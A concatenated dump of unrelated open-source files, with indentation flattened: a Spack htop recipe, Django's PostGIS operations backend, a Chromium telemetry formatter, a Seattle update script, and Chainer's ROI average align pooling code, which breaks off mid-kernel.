# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Htop(AutotoolsPackage):
"""htop is an interactive text-mode process viewer for Unix systems."""
homepage = "https://github.com/hishamhm/htop"
url = "https://hisham.hm/htop/releases/2.0.2/htop-2.0.2.tar.gz"
list_url = "https://hisham.hm/htop/releases"
list_depth = 1
version('2.0.2', '7d354d904bad591a931ad57e99fea84a')
depends_on('ncurses')
def configure_args(self):
return ['--enable-shared']
| lgpl-2.1 |
elky/django | django/contrib/gis/db/backends/postgis/operations.py | 5 | 15946 | import re
from django.conf import settings
from django.contrib.gis.db.backends.base.operations import (
BaseSpatialOperations,
)
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.db.models import GeometryField, RasterField
from django.contrib.gis.gdal import GDALRaster
from django.contrib.gis.geos.geometry import GEOSGeometryBase
from django.contrib.gis.geos.prototypes.io import wkb_r
from django.contrib.gis.measure import Distance
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.postgresql.operations import DatabaseOperations
from django.db.models import Func, Value
from django.db.utils import ProgrammingError
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
from .adapter import PostGISAdapter
from .models import PostGISGeometryColumns, PostGISSpatialRefSys
from .pgraster import from_pgraster
# Identifier to mark raster lookups as bilateral.
BILATERAL = 'bilateral'
class PostGISOperator(SpatialOperator):
def __init__(self, geography=False, raster=False, **kwargs):
# Only a subset of the operators and functions are available for the
# geography type.
self.geography = geography
# Only a subset of the operators and functions are available for the
# raster type. Lookups that don't suport raster will be converted to
# polygons. If the raster argument is set to BILATERAL, then the
# operator cannot handle mixed geom-raster lookups.
self.raster = raster
super().__init__(**kwargs)
def as_sql(self, connection, lookup, template_params, *args):
if lookup.lhs.output_field.geography and not self.geography:
raise ValueError('PostGIS geography does not support the "%s" '
'function/operator.' % (self.func or self.op,))
template_params = self.check_raster(lookup, template_params)
return super().as_sql(connection, lookup, template_params, *args)
def check_raster(self, lookup, template_params):
spheroid = lookup.rhs_params and lookup.rhs_params[-1] == 'spheroid'
# Check which input is a raster.
lhs_is_raster = lookup.lhs.field.geom_type == 'RASTER'
rhs_is_raster = isinstance(lookup.rhs, GDALRaster)
# Look for band indices and inject them if provided.
if lookup.band_lhs is not None and lhs_is_raster:
if not self.func:
raise ValueError('Band indices are not allowed for this operator, it works on bbox only.')
template_params['lhs'] = '%s, %s' % (template_params['lhs'], lookup.band_lhs)
if lookup.band_rhs is not None and rhs_is_raster:
if not self.func:
raise ValueError('Band indices are not allowed for this operator, it works on bbox only.')
template_params['rhs'] = '%s, %s' % (template_params['rhs'], lookup.band_rhs)
# Convert rasters to polygons if necessary.
if not self.raster or spheroid:
# Operators without raster support.
if lhs_is_raster:
template_params['lhs'] = 'ST_Polygon(%s)' % template_params['lhs']
if rhs_is_raster:
template_params['rhs'] = 'ST_Polygon(%s)' % template_params['rhs']
elif self.raster == BILATERAL:
# Operators with raster support but don't support mixed (rast-geom)
# lookups.
if lhs_is_raster and not rhs_is_raster:
template_params['lhs'] = 'ST_Polygon(%s)' % template_params['lhs']
elif rhs_is_raster and not lhs_is_raster:
template_params['rhs'] = 'ST_Polygon(%s)' % template_params['rhs']
return template_params
class ST_Polygon(Func):
function = 'ST_Polygon'
def __init__(self, expr):
super().__init__(expr)
expr = self.source_expressions[0]
if isinstance(expr, Value) and not expr._output_field_or_none:
self.source_expressions[0] = Value(expr.value, output_field=RasterField(srid=expr.value.srid))
@cached_property
def output_field(self):
return GeometryField(srid=self.source_expressions[0].field.srid)
class PostGISOperations(BaseSpatialOperations, DatabaseOperations):
name = 'postgis'
postgis = True
geography = True
geom_func_prefix = 'ST_'
Adapter = PostGISAdapter
collect = geom_func_prefix + 'Collect'
extent = geom_func_prefix + 'Extent'
extent3d = geom_func_prefix + '3DExtent'
length3d = geom_func_prefix + '3DLength'
makeline = geom_func_prefix + 'MakeLine'
perimeter3d = geom_func_prefix + '3DPerimeter'
unionagg = geom_func_prefix + 'Union'
gis_operators = {
'bbcontains': PostGISOperator(op='~', raster=True),
'bboverlaps': PostGISOperator(op='&&', geography=True, raster=True),
'contained': PostGISOperator(op='@', raster=True),
'overlaps_left': PostGISOperator(op='&<', raster=BILATERAL),
'overlaps_right': PostGISOperator(op='&>', raster=BILATERAL),
'overlaps_below': PostGISOperator(op='&<|'),
'overlaps_above': PostGISOperator(op='|&>'),
'left': PostGISOperator(op='<<'),
'right': PostGISOperator(op='>>'),
'strictly_below': PostGISOperator(op='<<|'),
'strictly_above': PostGISOperator(op='|>>'),
'same_as': PostGISOperator(op='~=', raster=BILATERAL),
'exact': PostGISOperator(op='~=', raster=BILATERAL), # alias of same_as
'contains': PostGISOperator(func='ST_Contains', raster=BILATERAL),
'contains_properly': PostGISOperator(func='ST_ContainsProperly', raster=BILATERAL),
'coveredby': PostGISOperator(func='ST_CoveredBy', geography=True, raster=BILATERAL),
'covers': PostGISOperator(func='ST_Covers', geography=True, raster=BILATERAL),
'crosses': PostGISOperator(func='ST_Crosses'),
'disjoint': PostGISOperator(func='ST_Disjoint', raster=BILATERAL),
'equals': PostGISOperator(func='ST_Equals'),
'intersects': PostGISOperator(func='ST_Intersects', geography=True, raster=BILATERAL),
'overlaps': PostGISOperator(func='ST_Overlaps', raster=BILATERAL),
'relate': PostGISOperator(func='ST_Relate'),
'touches': PostGISOperator(func='ST_Touches', raster=BILATERAL),
'within': PostGISOperator(func='ST_Within', raster=BILATERAL),
'dwithin': PostGISOperator(func='ST_DWithin', geography=True, raster=BILATERAL),
}
unsupported_functions = set()
select = '%s::bytea'
select_extent = None
@cached_property
def function_names(self):
function_names = {
'BoundingCircle': 'ST_MinimumBoundingCircle',
'NumPoints': 'ST_NPoints',
}
if self.spatial_version < (2, 2, 0):
function_names.update({
'DistanceSphere': 'ST_distance_sphere',
'DistanceSpheroid': 'ST_distance_spheroid',
'LengthSpheroid': 'ST_length_spheroid',
'MemSize': 'ST_mem_size',
})
return function_names
@cached_property
def spatial_version(self):
"""Determine the version of the PostGIS library."""
# Trying to get the PostGIS version because the function
# signatures will depend on the version used. The cost
# here is a database query to determine the version, which
# can be mitigated by setting `POSTGIS_VERSION` with a 3-tuple
# comprising user-supplied values for the major, minor, and
# subminor revision of PostGIS.
if hasattr(settings, 'POSTGIS_VERSION'):
version = settings.POSTGIS_VERSION
else:
# Run a basic query to check the status of the connection so we're
# sure we only raise the error below if the problem comes from
# PostGIS and not from PostgreSQL itself (see #24862).
self._get_postgis_func('version')
try:
vtup = self.postgis_version_tuple()
except ProgrammingError:
raise ImproperlyConfigured(
'Cannot determine PostGIS version for database "%s" '
'using command "SELECT postgis_lib_version()". '
'GeoDjango requires at least PostGIS version 2.1. '
'Was the database created from a spatial database '
'template?' % self.connection.settings_dict['NAME']
)
version = vtup[1:]
return version
def convert_extent(self, box):
"""
Return a 4-tuple extent for the `Extent` aggregate by converting
the bounding box text returned by PostGIS (`box` argument), for
example: "BOX(-90.0 30.0, -85.0 40.0)".
"""
if box is None:
return None
ll, ur = box[4:-1].split(',')
xmin, ymin = map(float, ll.split())
xmax, ymax = map(float, ur.split())
return (xmin, ymin, xmax, ymax)
def convert_extent3d(self, box3d):
"""
Return a 6-tuple extent for the `Extent3D` aggregate by converting
the 3d bounding-box text returned by PostGIS (`box3d` argument), for
example: "BOX3D(-90.0 30.0 1, -85.0 40.0 2)".
"""
if box3d is None:
return None
ll, ur = box3d[6:-1].split(',')
xmin, ymin, zmin = map(float, ll.split())
xmax, ymax, zmax = map(float, ur.split())
return (xmin, ymin, zmin, xmax, ymax, zmax)
def geo_db_type(self, f):
"""
Return the database field type for the given spatial field.
"""
if f.geom_type == 'RASTER':
return 'raster'
# Type-based geometries.
# TODO: Support 'M' extension.
if f.dim == 3:
geom_type = f.geom_type + 'Z'
else:
geom_type = f.geom_type
if f.geography:
if f.srid != 4326:
raise NotImplementedError('PostGIS only supports geography columns with an SRID of 4326.')
return 'geography(%s,%d)' % (geom_type, f.srid)
else:
return 'geometry(%s,%d)' % (geom_type, f.srid)
def get_distance(self, f, dist_val, lookup_type):
"""
Retrieve the distance parameters for the given geometry field,
distance lookup value, and the distance lookup type.
This is the most complex implementation of the spatial backends due to
what is supported on geodetic geometry columns vs. what's available on
projected geometry columns. In addition, it has to take into account
the geography column type.
"""
# Getting the distance parameter
value = dist_val[0]
# Shorthand boolean flags.
geodetic = f.geodetic(self.connection)
geography = f.geography
if isinstance(value, Distance):
if geography:
dist_param = value.m
elif geodetic:
if lookup_type == 'dwithin':
raise ValueError('Only numeric values of degree units are '
'allowed on geographic DWithin queries.')
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
# Assuming the distance is in the units of the field.
dist_param = value
return [dist_param]
def get_geom_placeholder(self, f, value, compiler):
"""
Provide a proper substitution value for Geometries or rasters that are
not in the SRID of the field. Specifically, this routine will
substitute in the ST_Transform() function call.
"""
tranform_func = self.spatial_function_name('Transform')
if hasattr(value, 'as_sql'):
if value.field.srid == f.srid:
placeholder = '%s'
else:
placeholder = '%s(%%s, %s)' % (tranform_func, f.srid)
return placeholder
# Get the srid for this object
if value is None:
value_srid = None
else:
value_srid = value.srid
# Adding Transform() to the SQL placeholder if the value srid
# is not equal to the field srid.
if value_srid is None or value_srid == f.srid:
placeholder = '%s'
else:
placeholder = '%s(%%s, %s)' % (tranform_func, f.srid)
return placeholder
def _get_postgis_func(self, func):
"""
Helper routine for calling PostGIS functions and returning their result.
"""
# Close out the connection. See #9437.
with self.connection.temporary_connection() as cursor:
cursor.execute('SELECT %s()' % func)
return cursor.fetchone()[0]
def postgis_geos_version(self):
"Return the version of the GEOS library used with PostGIS."
return self._get_postgis_func('postgis_geos_version')
def postgis_lib_version(self):
"Return the version number of the PostGIS library used with PostgreSQL."
return self._get_postgis_func('postgis_lib_version')
def postgis_proj_version(self):
"Return the version of the PROJ.4 library used with PostGIS."
return self._get_postgis_func('postgis_proj_version')
def postgis_version(self):
"Return PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_version')
def postgis_full_version(self):
"Return PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_full_version')
def postgis_version_tuple(self):
"""
Return the PostGIS version as a tuple (version string, major,
minor, subminor).
"""
version = self.postgis_lib_version()
return (version,) + get_version_tuple(version)
def proj_version_tuple(self):
"""
Return the version of PROJ.4 used by PostGIS as a tuple of the
major, minor, and subminor release numbers.
"""
proj_regex = re.compile(r'(\d+)\.(\d+)\.(\d+)')
proj_ver_str = self.postgis_proj_version()
m = proj_regex.search(proj_ver_str)
if m:
return tuple(map(int, [m.group(1), m.group(2), m.group(3)]))
else:
raise Exception('Could not determine PROJ.4 version from PostGIS.')
def spatial_aggregate_name(self, agg_name):
if agg_name == 'Extent3D':
return self.extent3d
else:
return self.geom_func_prefix + agg_name
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
return PostGISGeometryColumns
def spatial_ref_sys(self):
return PostGISSpatialRefSys
def parse_raster(self, value):
"""Convert a PostGIS HEX String into a dict readable by GDALRaster."""
return from_pgraster(value)
def distance_expr_for_lookup(self, lhs, rhs, **kwargs):
return super().distance_expr_for_lookup(
self._normalize_distance_lookup_arg(lhs),
self._normalize_distance_lookup_arg(rhs),
**kwargs
)
@staticmethod
def _normalize_distance_lookup_arg(arg):
is_raster = (
arg.field.geom_type == 'RASTER'
if hasattr(arg, 'field') else
isinstance(arg, GDALRaster)
)
return ST_Polygon(arg) if is_raster else arg
def get_geometry_converter(self, expression):
read = wkb_r().read
geom_class = expression.output_field.geom_class
def converter(value, expression, connection):
return None if value is None else GEOSGeometryBase(read(value), geom_class)
return converter
def get_area_att_for_field(self, field):
return 'sq_m'
| bsd-3-clause |
FusionSP/android_external_chromium_org | tools/telemetry/telemetry/results/output_formatter.py | 77 | 1116 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class OutputFormatter(object):
"""A formatter for PageTestResults.
An OutputFormatter takes PageTestResults, formats the results
(telemetry.value.Value instances), and output the formatted results
in the given output stream.
Examples of output formatter: CsvOutputFormatter produces results in
CSV format."""
def __init__(self, output_stream):
"""Constructs a new formatter that writes to the output_stream.
Args:
output_stream: The stream to write the formatted output to.
"""
self._output_stream = output_stream
def Format(self, page_test_results):
"""Formats the given PageTestResults into the output stream.
This will be called once at the end of a benchmark.
Args:
page_test_results: A PageTestResults object containing all results
from the current benchmark run.
"""
raise NotImplementedError()
@property
def output_stream(self):
return self._output_stream
| bsd-3-clause |
sburnett/seattle | dist/update_software.py | 2 | 1540 | """
<Program Name>
update_software.py
<Started>
December 1, 2008
<Author>
Carter Butaud
<Purpose>
Populates the folder that the software updater checks with
the latest version of the code.
"""
import sys
import make_base_installers
DEBUG = False
def update(trunk_location, pubkey, privkey, update_dir):
"""
<Purpose>
Populates the update directory (set by a constant) with the
program files from the current repository.
<Arguments>
trunk_location:
The location of the repository's trunk directory, used to
find the program files.
pubkey:
The public key used to generate the metafile.
privkey:
The private key used to generate the metafile.
updatedir:
The directory to put the generated update files in.
<Exceptions>
IOError on bad filepath.
<Side Effects>
None.
<Returns>
None.
"""
# If we're in DEBUG mode, don't use the real update
# directory
if DEBUG:
print "Debug mode..."
update_dir = update_dir + "/test"
make_base_installers.prepare_gen_files(trunk_location, update_dir,
False, pubkey, privkey, False)
def main():
global DEBUG
if len(sys.argv) < 3:
print "usage: python update_software.py trunk/location/ publickey privatekey updatedir [-d]"
elif len(sys.argv) == 6:
if sys.argv[5] == "-d":
DEBUG = True
update(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
if __name__ == "__main__":
main()
| mit |
chainer/chainer | chainer/functions/pooling/roi_average_align_2d.py | 4 | 23553 | # Modified work:
# -----------------------------------------------------------------------------
# Copyright (c) 2018 Preferred Infrastructure, Inc.
# Copyright (c) 2018 Preferred Networks, Inc.
# -----------------------------------------------------------------------------
# Original work:
# -----------------------------------------------------------------------------
# Copyright (c) 2015 by Contributors
# \file roi_pooling.cu
# \brief roi pooling operator
# \author Ross Girshick, Kye-Hyeon Kim, Jian Guo
# \changed to roi_align by Elaine Bao
# \file roi_align.cu
# \roi align operator described in Mask RCNN
# -----------------------------------------------------------------------------
import numbers
import numpy
import six
import chainer
from chainer.backends import cuda
from chainer import function
from chainer import utils
from chainer.utils import type_check
def _pair(x):
if isinstance(x, chainer.utils.collections_abc.Iterable):
return x
return x, x
def _get_bounds(p, limit):
if p < -1 or p > limit:
# out of range, so it is empty
return None, None, None
low = int(numpy.floor(p))
if low == limit:
low = low - 1
high = low + 1
if low <= -1:
p = 0
elif high >= limit:
p = limit - 1
return p, low, high
def _get_bilinear_interp_params(y, x, y_low, x_low, y_high, x_high):
ly = y - y_low
lx = x - x_low
hy = y_high - y
hx = x_high - x
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
return w1, w2, w3, w4
_GET_BILINEAR_INTERP_KERNEL = '''
__device__
bool get_bounds(
T &p, const int limit, int &low, int &high) {
if (p < -1. || p > limit) {
// empty
return false;
}
low = (int)floor(p);
if (low == limit) {
low = low - 1;
}
high = low + 1;
if (low <= -1) {
p = (T) 0.0;
} else if (high >= limit) {
p = (T) (limit - 1);
}
return true;
}
__device__
void get_bilinear_interp_params(
T y, T x, int y_low, int x_low, int y_high, int x_high,
T &w1, T &w2, T &w3, T &w4) {
T ly = y - y_low;
T lx = x - x_low;
T hy = y_high - y;
T hx = x_high - x;
w1 = hy * hx;
w2 = hy * lx;
w3 = ly * hx;
w4 = ly * lx;
}
'''
class ROIAverageAlign2D(function.Function):
"""ROI average align over a set of 2d planes."""
def __init__(self, outsize, spatial_scale, sampling_ratio=None):
outh, outw = _pair(outsize)
if not (isinstance(outh, numbers.Integral) and outh > 0):
raise TypeError(
'outsize[0] must be positive integer: {}, {}'
.format(type(outh), outh))
if not (isinstance(outw, numbers.Integral) and outw > 0):
raise TypeError(
'outsize[1] must be positive integer: {}, {}'
.format(type(outw), outw))
if isinstance(spatial_scale, numbers.Integral):
spatial_scale = float(spatial_scale)
if not (isinstance(spatial_scale, numbers.Real) and
spatial_scale > 0):
raise TypeError(
'spatial_scale must be a positive float number: {}, {}'
.format(type(spatial_scale), spatial_scale))
sampling_ratio = _pair(sampling_ratio)
if not all((isinstance(s, numbers.Integral) and s >= 1) or
s is None for s in sampling_ratio):
raise TypeError(
'sampling_ratio must be integer >= 1 or a pair of it: {}'
.format(sampling_ratio))
self.outh, self.outw = outh, outw
self.spatial_scale = spatial_scale
self.sampling_ratio = sampling_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, roi_type, roi_index_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 4,
roi_type.dtype == numpy.float32,
roi_type.ndim == 2,
roi_type.shape[1] == 4,
roi_index_type.dtype == numpy.int32,
roi_index_type.ndim == 1,
roi_type.shape[0] == roi_index_type.shape[0],
)
def forward_cpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_rois = bottom_rois.shape[0]
top_data = numpy.empty((n_rois, channels, self.outh,
self.outw), dtype=bottom_data.dtype)
pooled_width, pooled_height = self.outw, self.outh
spatial_scale = self.spatial_scale
for i in six.moves.range(top_data.size):
pw = i % pooled_width
ph = int(i / pooled_width) % pooled_height
c = int(i / pooled_width / pooled_height) % channels
n = int(i / pooled_width / pooled_height / channels)
roi_batch_ind = int(bottom_roi_indices[n])
roi_start_h = bottom_rois[n, 0] * spatial_scale
roi_start_w = bottom_rois[n, 1] * spatial_scale
roi_end_h = bottom_rois[n, 2] * spatial_scale
roi_end_w = bottom_rois[n, 3] * spatial_scale
roi_height = max(roi_end_h - roi_start_h, 1.)
roi_width = max(roi_end_w - roi_start_w, 1.)
bin_size_h = roi_height / pooled_height
bin_size_w = roi_width / pooled_width
if self.sampling_ratio[0] is None:
roi_bin_grid_h = int(numpy.ceil(roi_height / pooled_height))
else:
roi_bin_grid_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
roi_bin_grid_w = int(numpy.ceil(roi_width / pooled_width))
else:
roi_bin_grid_w = self.sampling_ratio[1]
count = roi_bin_grid_h * roi_bin_grid_w
output_val = 0.
for iy in six.moves.range(roi_bin_grid_h):
y = roi_start_h + ph * bin_size_h + \
(iy + .5) * bin_size_h / roi_bin_grid_h
y, y_low, y_high = _get_bounds(y, height)
if y is None or y_low is None or y_high is None:
continue
for ix in six.moves.range(roi_bin_grid_w):
x = roi_start_w + pw * bin_size_w + \
(ix + .5) * bin_size_w / roi_bin_grid_w
x, x_low, x_high = _get_bounds(x, width)
if x is None or x_low is None or x_high is None:
continue
# bilinear interpolation {{
w1, w2, w3, w4 = _get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high)
if w1 > 0 and y_low >= 0 and x_low >= 0:
v1 = bottom_data[roi_batch_ind, c, y_low, x_low]
output_val += w1 * v1
if w2 > 0 and y_low >= 0 and x_high <= width - 1:
v2 = bottom_data[roi_batch_ind, c, y_low, x_high]
output_val += w2 * v2
if w3 > 0 and y_high <= height - 1 and x_low >= 0:
v3 = bottom_data[roi_batch_ind, c, y_high, x_low]
output_val += w3 * v3
if w4 > 0 and y_high <= height - 1 and x_high <= width - 1:
v4 = bottom_data[roi_batch_ind, c, y_high, x_high]
output_val += w4 * v4
# }}
output_val /= count
top_data[n, c, ph, pw] = output_val
return top_data,
def forward_gpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_rois = bottom_rois.shape[0]
top_data = cuda.cupy.empty((n_rois, channels, self.outh,
self.outw), dtype=bottom_data.dtype)
if self.sampling_ratio[0] is None:
sampling_ratio_h = 0
else:
sampling_ratio_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
sampling_ratio_w = 0
else:
sampling_ratio_w = self.sampling_ratio[1]
cuda.elementwise(
'''
raw T bottom_data, T spatial_scale, int32 channels,
int32 height, int32 width, int32 pooled_height, int32 pooled_width,
int32 sampling_ratio_h, int32 sampling_ratio_w,
raw T bottom_rois, raw int32 bottom_roi_indices
''',
'T top_data',
'''
int pw = i % pooled_width;
int ph = (i / pooled_width) % pooled_height;
int c = (i / pooled_width / pooled_height) % channels;
int n = i / pooled_width / pooled_height / channels;
int roi_batch_ind = bottom_roi_indices[n];
T roi_start_h = bottom_rois[n * 4 + 0] * spatial_scale;
T roi_start_w = bottom_rois[n * 4 + 1] * spatial_scale;
T roi_end_h = bottom_rois[n * 4 + 2] * spatial_scale;
T roi_end_w = bottom_rois[n * 4 + 3] * spatial_scale;
// Force malformed ROIs to be 1x1
T roi_height = max(roi_end_h - roi_start_h, (T)1.);
T roi_width = max(roi_end_w - roi_start_w, (T)1.);
T bin_size_h = static_cast<T>(roi_height)
/ static_cast<T>(pooled_height);
T bin_size_w = static_cast<T>(roi_width)
/ static_cast<T>(pooled_width);
int bottom_data_offset =
(roi_batch_ind * channels + c) * height * width;
// We use roi_bin_grid to sample the grid and mimic integral
int roi_bin_grid_h = (sampling_ratio_h > 0)
? sampling_ratio_h
: ceil(roi_height / pooled_height); // e.g. = 2
int roi_bin_grid_w = (sampling_ratio_w > 0)
? sampling_ratio_w
: ceil(roi_width / pooled_width);
// We do average (integral) pooling inside a bin
T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4
T output_val = 0.;
for (int iy = 0; iy < roi_bin_grid_h; iy++) // e.g. iy = 0, 1
{
T y = roi_start_h + ph * bin_size_h +
static_cast<T>(iy + .5f) * bin_size_h /
static_cast<T>(roi_bin_grid_h); // e.g. 0.5, 1.5
int y_low, y_high;
bool y_ret = get_bounds(y, height, y_low, y_high);
if (!y_ret) continue;
for (int ix = 0; ix < roi_bin_grid_w; ix++) {
T x = roi_start_w + pw * bin_size_w +
static_cast<T>(ix + .5f) * bin_size_w /
static_cast<T>(roi_bin_grid_w);
int x_low, x_high;
bool x_ret = get_bounds(x, width, x_low, x_high);
if (!x_ret) continue;
// bilinear_interpolation_gradient {{
T w1, w2, w3, w4;
get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high, w1, w2, w3, w4);
if (w1 > 0 && y_low >= 0 && x_low >= 0) {
T v1 = bottom_data[
bottom_data_offset + y_low * width + x_low];
output_val += w1 * v1;
}
if (w2 > 0 && y_low >= 0 && x_high <= width - 1) {
T v2 = bottom_data[
bottom_data_offset + y_low * width + x_high];
output_val += w2 * v2;
}
if (w3 > 0 && y_high <= height - 1 && x_low >= 0) {
T v3 = bottom_data[
bottom_data_offset + y_high * width + x_low];
output_val += w3 * v3;
}
if (w4 > 0 && y_high <= height - 1 &&
x_high <= width - 1) {
T v4 = bottom_data[
bottom_data_offset + y_high * width + x_high];
output_val += w4 * v4;
}
// }}
}
}
output_val /= count;
top_data = output_val;
''',
'roi_average_align_2d_fwd',
preamble=_GET_BILINEAR_INTERP_KERNEL,
)(bottom_data, self.spatial_scale, channels, height, width,
self.outh, self.outw, sampling_ratio_h, sampling_ratio_w,
bottom_rois, bottom_roi_indices, top_data)
return top_data,
def backward_cpu(self, inputs, gy):
bottom_rois, bottom_roi_indices = inputs[1:]
channels, height, width = self._bottom_data_shape[1:]
bottom_diff = numpy.zeros(self._bottom_data_shape, gy[0].dtype)
spatial_scale = self.spatial_scale
pooled_height = self.outh
pooled_width = self.outw
top_diff = gy[0]
for i in six.moves.range(top_diff.size):
pw = i % pooled_width
ph = int(i / pooled_width) % pooled_height
c = int(i / pooled_width / pooled_height) % channels
n = int(i / pooled_width / pooled_height / channels)
roi_batch_ind = int(bottom_roi_indices[n])
roi_start_h = bottom_rois[n, 0] * spatial_scale
roi_start_w = bottom_rois[n, 1] * spatial_scale
roi_end_h = bottom_rois[n, 2] * spatial_scale
roi_end_w = bottom_rois[n, 3] * spatial_scale
roi_height = max(roi_end_h - roi_start_h, 1.)
roi_width = max(roi_end_w - roi_start_w, 1.)
bin_size_h = roi_height / pooled_height
bin_size_w = roi_width / pooled_width
top_diff_this_bin = top_diff[n, c, ph, pw]
if self.sampling_ratio[0] is None:
roi_bin_grid_h = int(numpy.ceil(roi_height / pooled_height))
else:
roi_bin_grid_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
roi_bin_grid_w = int(numpy.ceil(roi_width / pooled_width))
else:
roi_bin_grid_w = self.sampling_ratio[1]
count = roi_bin_grid_h * roi_bin_grid_w
for iy in six.moves.range(roi_bin_grid_h):
y = roi_start_h + ph * bin_size_h + \
(iy + .5) * bin_size_h / roi_bin_grid_h
y, y_low, y_high = _get_bounds(y, height)
if y is None or y_low is None or y_high is None:
continue
for ix in six.moves.range(roi_bin_grid_w):
x = roi_start_w + pw * bin_size_w + \
(ix + .5) * bin_size_w / roi_bin_grid_w
x, x_low, x_high = _get_bounds(x, width)
if x is None or x_low is None or x_high is None:
continue
# bilinear_interpolation_gradient {{
w1, w2, w3, w4 = _get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high)
if w1 > 0 and y_low >= 0 and x_low >= 0:
g1 = top_diff_this_bin * w1 / count
bottom_diff[roi_batch_ind, c, y_low, x_low] += g1
if w2 > 0 and y_low >= 0 and x_high <= width - 1:
g2 = top_diff_this_bin * w2 / count
bottom_diff[roi_batch_ind, c, y_low, x_high] += g2
if w3 > 0 and y_high <= height - 1 and x_low >= 0:
g3 = top_diff_this_bin * w3 / count
bottom_diff[roi_batch_ind, c, y_high, x_low] += g3
if w4 > 0 and y_high <= height - 1 and x_high <= width - 1:
g4 = top_diff_this_bin * w4 / count
bottom_diff[roi_batch_ind, c, y_high, x_high] += g4
# }}
return bottom_diff, None, None
def backward_gpu(self, inputs, gy):
utils.nondeterministic('atomicAdd')
bottom_rois, bottom_roi_indices = inputs[1:]
channels, height, width = self._bottom_data_shape[1:]
bottom_diff = cuda.cupy.zeros(self._bottom_data_shape, gy[0].dtype)
if self.sampling_ratio[0] is None:
sampling_ratio_h = 0
else:
sampling_ratio_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
sampling_ratio_w = 0
else:
sampling_ratio_w = self.sampling_ratio[1]
cuda.elementwise(
'''
raw T top_diff,
int32 num_rois, T spatial_scale,
int32 channels, int32 height, int32 width,
int32 pooled_height, int32 pooled_width,
int32 sampling_ratio_h, int32 sampling_ratio_w,
raw T bottom_rois, raw int32 bottom_roi_indices
''',
'raw T bottom_diff',
'''
// (n, c, h, w) coords in bottom data
int pw = i % pooled_width;
int ph = (i / pooled_width) % pooled_height;
int c = (i / pooled_width / pooled_height) % channels;
int n = i / pooled_width / pooled_height / channels;
// Do not using rounding; this implementation detail is critical
int roi_batch_ind = bottom_roi_indices[n];
T roi_start_h = bottom_rois[n * 4 + 0] * spatial_scale;
T roi_start_w = bottom_rois[n * 4 + 1] * spatial_scale;
T roi_end_h = bottom_rois[n * 4 + 2] * spatial_scale;
T roi_end_w = bottom_rois[n * 4 + 3] * spatial_scale;
// Force malformed ROIs to be 1x1
T roi_width = max(roi_end_w - roi_start_w, (T)1.);
T roi_height = max(roi_end_h - roi_start_h, (T)1.);
T bin_size_h = static_cast<T>(roi_height) /
static_cast<T>(pooled_height);
T bin_size_w = static_cast<T>(roi_width) /
static_cast<T>(pooled_width);
int bottom_diff_offset =
(roi_batch_ind * channels + c) * height * width;
int top_offset = (n * channels + c) * pooled_height * pooled_width;
T top_diff_this_bin =
top_diff[top_offset + ph * pooled_width + pw];
// We use roi_bin_grid to sample the grid and mimic integral
int roi_bin_grid_h = (sampling_ratio_h > 0)
? sampling_ratio_h
: ceil(roi_height / pooled_height); // e.g. = 2
int roi_bin_grid_w = (sampling_ratio_w > 0)
? sampling_ratio_w
: ceil(roi_width / pooled_width);
// We do average (integral) pooling inside a bin
T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4
for (int iy = 0; iy < roi_bin_grid_h; iy++) {
T y = roi_start_h + ph * bin_size_h +
static_cast<T>(iy + .5f) * bin_size_h /
static_cast<T>(roi_bin_grid_h); // e.g. 0.5, 1.5
int y_low, y_high;
bool y_ret = get_bounds(y, height, y_low, y_high);
if (!y_ret) continue;
for (int ix = 0; ix < roi_bin_grid_w; ix++) {
T x = roi_start_w + pw * bin_size_w +
static_cast<T>(ix + .5f) * bin_size_w /
static_cast<T>(roi_bin_grid_w);
int x_low, x_high;
bool x_ret = get_bounds(x, width, x_low, x_high);
if (!x_ret) continue;
// bilinear_interpolation_gradient {{
T w1, w2, w3, w4;
get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high, w1, w2, w3, w4);
if (w1 > 0 && y_low >= 0 && x_low >= 0) {
T g1 = top_diff_this_bin * w1 / count;
atomicAdd(&bottom_diff[
bottom_diff_offset + y_low * width + x_low], g1);
}
if (w2 > 0 && y_low >= 0 && x_high <= width - 1) {
T g2 = top_diff_this_bin * w2 / count;
atomicAdd(&bottom_diff[
bottom_diff_offset + y_low * width + x_high], g2);
}
if (w3 > 0 && y_high <= height - 1 && x_low >= 0) {
T g3 = top_diff_this_bin * w3 / count;
atomicAdd(&bottom_diff[
